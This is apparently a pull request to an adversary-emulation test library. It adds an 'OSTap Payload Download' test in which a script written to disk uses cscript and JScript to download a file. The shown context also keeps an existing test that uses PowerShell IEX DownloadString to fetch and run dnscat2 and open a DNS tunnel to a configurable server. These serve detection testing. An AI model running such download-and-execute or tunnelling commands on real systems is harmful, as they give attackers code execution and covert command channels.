### PR TITLE
T1071-8 OSTap Payload Download

### DIFF
--- a/atomics/T1071/T1071.yaml
+++ b/atomics/T1071/T1071.yaml
@@ -185,3 +185,34 @@ atomic_tests:
     command: |
       IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
       Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
+
+- name: OSTap Payload Download
+  description: |
+    Uses cscript //E:jscript to download a file
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    script_file:
+      description: File to execute jscript code from
+      type: Path
+      default: '%TEMP%\OSTapGet.js'
+    file_url:
+      description: URL to retrieve file from
+      type: Url
+      default: https://www.w3.org/TR/PNG/iso_8859-1.txt
+    out_file:
+      description: File to download payload to
+      type: Path
+      default: T1071-Out.txt
+
+  executor:
+    name: command_prompt
+    elevation_required: false
+    command: |
+      echo var url = "#{file_url}", filename = "#{out_file}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+      cscript //E:Jscript #{script_file}
+    cleanup_command: |
+      del #{script_file} /F /Q
+      del #{out_file} /F /Q 


### PR DESCRIPTION
**Details:**
Added T1071-8 OSTap Payload Download
uses cscript //E:jscript to download and write a file to disk

**Testing:**
Windows 10